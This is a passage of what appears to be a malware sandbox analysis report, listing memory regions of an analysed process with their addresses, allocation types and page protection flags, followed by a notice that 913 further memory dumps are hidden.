|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
1C349000
|
heap
|
page read and write
|
||
|
354000
|
heap
|
page read and write
|
||
|
381000
|
heap
|
page read and write
|
||
|
34E000
|
heap
|
page read and write
|
||
|
1C1CD000
|
stack
|
page read and write
|
||
|
3EAB000
|
heap
|
page read and write
|
||
|
34C1000
|
heap
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
1D30000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
2E12000
|
trusted library allocation
|
page read and write
|
||
|
1C6C0000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
1AD1B000
|
heap
|
page read and write
|
||
|
24E6000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
|
50D000
|
stack
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
1D00000
|
direct allocation
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
1C25D000
|
stack
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
1D1B000
|
direct allocation
|
page read and write
|
||
|
7FE89B70000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
366E000
|
trusted library allocation
|
page read and write
|
||
|
12476000
|
trusted library allocation
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
1A4EF000
|
stack
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
3424000
|
heap
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
3A2000
|
heap
|
page read and write
|
||
|
3448000
|
heap
|
page read and write
|
||
|
510000
|
heap
|
page execute and read and write
|
||
|
12321000
|
trusted library allocation
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
C0E000
|
stack
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
24D2000
|
trusted library allocation
|
page read and write
|
||
|
43B4000
|
heap
|
page read and write
|
||
|
12380000
|
trusted library allocation
|
page read and write
|
||
|
43B7000
|
heap
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AC8000
|
trusted library allocation
|
page read and write
|
||
|
1D40000
|
heap
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
262000
|
stack
|
page read and write
|
||
|
350E000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
1AFE0000
|
heap
|
page read and write
|
||
|
1D95000
|
heap
|
page read and write
|
||
|
1C260000
|
heap
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
483000
|
heap
|
page read and write
|
||
|
7FE89BB5000
|
trusted library allocation
|
page read and write
|
||
|
34BA000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
1C50C000
|
stack
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
34B1000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
1FC0000
|
direct allocation
|
page read and write
|
||
|
1A684000
|
heap
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A86000
|
trusted library allocation
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
1CC6F000
|
stack
|
page read and write
|
||
|
34AE000
|
heap
|
page read and write
|
||
|
7FE89C80000
|
trusted library allocation
|
page read and write
|
||
|
2837000
|
trusted library allocation
|
page read and write
|
||
|
1A7C8000
|
heap
|
page execute and read and write
|
||
|
17F000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
2B8000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4F6000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
1A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89BDD000
|
trusted library allocation
|
page read and write
|
||
|
12371000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1B210000
|
heap
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
39A0000
|
heap
|
page read and write
|
||
|
70E000
|
stack
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
DDF000
|
stack
|
page read and write
|
||
|
A0000
|
heap
|
page read and write
|
||
|
34F9000
|
heap
|
page read and write
|
||
|
34AF000
|
heap
|
page read and write
|
||
|
1B36F000
|
stack
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
34BA000
|
heap
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
1C3D0000
|
heap
|
page read and write
|
||
|
1C32F000
|
heap
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
34E6000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
34EF000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
1C27E000
|
stack
|
page read and write
|
||
|
DDE000
|
stack
|
page read and write | page guard
|
||
|
20000
|
heap
|
page read and write
|
||
|
2D1F000
|
stack
|
page read and write
|
||
|
549E000
|
stack
|
page read and write
|
||
|
49C000
|
heap
|
page read and write
|
||
|
410000
|
heap
|
page read and write
|
||
|
1A7C4000
|
heap
|
page execute and read and write
|
||
|
1B206000
|
heap
|
page read and write
|
||
|
1AD01000
|
heap
|
page read and write
|
||
|
34ED000
|
heap
|
page read and write
|
||
|
36A000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
4CB9000
|
heap
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
3E9B000
|
heap
|
page read and write
|
||
|
34CD000
|
heap
|
page read and write
|
||
|
439A000
|
heap
|
page read and write
|
||
|
485000
|
heap
|
page read and write
|
||
|
48C000
|
heap
|
page read and write
|
||
|
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
43B3000
|
heap
|
page read and write
|
||
|
2100000
|
heap
|
page execute and read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
30E4000
|
trusted library allocation
|
page read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
1A2000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
1D1D000
|
direct allocation
|
page read and write
|
||
|
133000
|
trusted library allocation
|
page execute and read and write
|
||
|
408000
|
heap
|
page read and write
|
||
|
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
|
123A1000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
1BFCB000
|
heap
|
page read and write
|
||
|
34B4000
|
heap
|
page read and write
|
||
|
3E99000
|
heap
|
page read and write
|
||
|
388000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
1A8AE000
|
heap
|
page execute and read and write
|
||
|
340C000
|
stack
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
99000
|
heap
|
page read and write
|
||
|
24EE000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
trusted library allocation
|
page execute read
|
||
|
2A6000
|
heap
|
page read and write
|
||
|
46D000
|
heap
|
page read and write
|
||
|
43C8000
|
heap
|
page read and write
|
||
|
34CB000
|
heap
|
page read and write
|
||
|
7FE89C03000
|
trusted library allocation
|
page read and write
|
||
|
1A878000
|
heap
|
page execute and read and write
|
||
|
1AEBE000
|
stack
|
page read and write
|
||
|
411000
|
heap
|
page read and write
|
||
|
1EC0000
|
direct allocation
|
page read and write
|
||
|
359000
|
heap
|
page read and write
|
||
|
34C7000
|
heap
|
page read and write
|
||
|
3AC000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
1A869000
|
stack
|
page read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
516000
|
heap
|
page read and write
|
||
|
4DC000
|
heap
|
page read and write
|
||
|
210000
|
heap
|
page read and write
|
||
|
43B3000
|
heap
|
page read and write
|
||
|
1B4E0000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
4EF000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
34A7000
|
heap
|
page read and write
|
||
|
2BF3000
|
trusted library allocation
|
page read and write
|
||
|
233000
|
stack
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
1ACF0000
|
heap
|
page read and write
|
||
|
76E000
|
stack
|
page read and write
|
||
|
34B7000
|
heap
|
page read and write
|
||
|
384F000
|
stack
|
page read and write
|
||
|
720000
|
trusted library allocation
|
page execute and read and write
|
||
|
24FA000
|
trusted library allocation
|
page read and write
|
||
|
1A5A0000
|
heap
|
page read and write
|
||
|
310000
|
heap
|
page read and write
|
||
|
7FE898D3000
|
trusted library allocation
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
250E000
|
trusted library allocation
|
page read and write
|
||
|
1B1CF000
|
stack
|
page read and write
|
||
|
1A672000
|
heap
|
page read and write
|
||
|
13D000
|
trusted library allocation
|
page execute and read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2EE000
|
heap
|
page read and write
|
||
|
1A708000
|
stack
|
page read and write
|
||
|
3504000
|
heap
|
page read and write
|
||
|
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
|
4F7000
|
heap
|
page read and write
|
||
|
3BE000
|
heap
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
3507000
|
heap
|
page read and write
|
||
|
463000
|
heap
|
page read and write
|
||
|
7FE89AC4000
|
trusted library allocation
|
page read and write
|
||
|
34CB000
|
heap
|
page read and write
|
||
|
47B3000
|
heap
|
page read and write
|
||
|
1FD3000
|
direct allocation
|
page read and write
|
||
|
3509000
|
heap
|
page read and write
|
There are 913 hidden memdumps, click here to show them.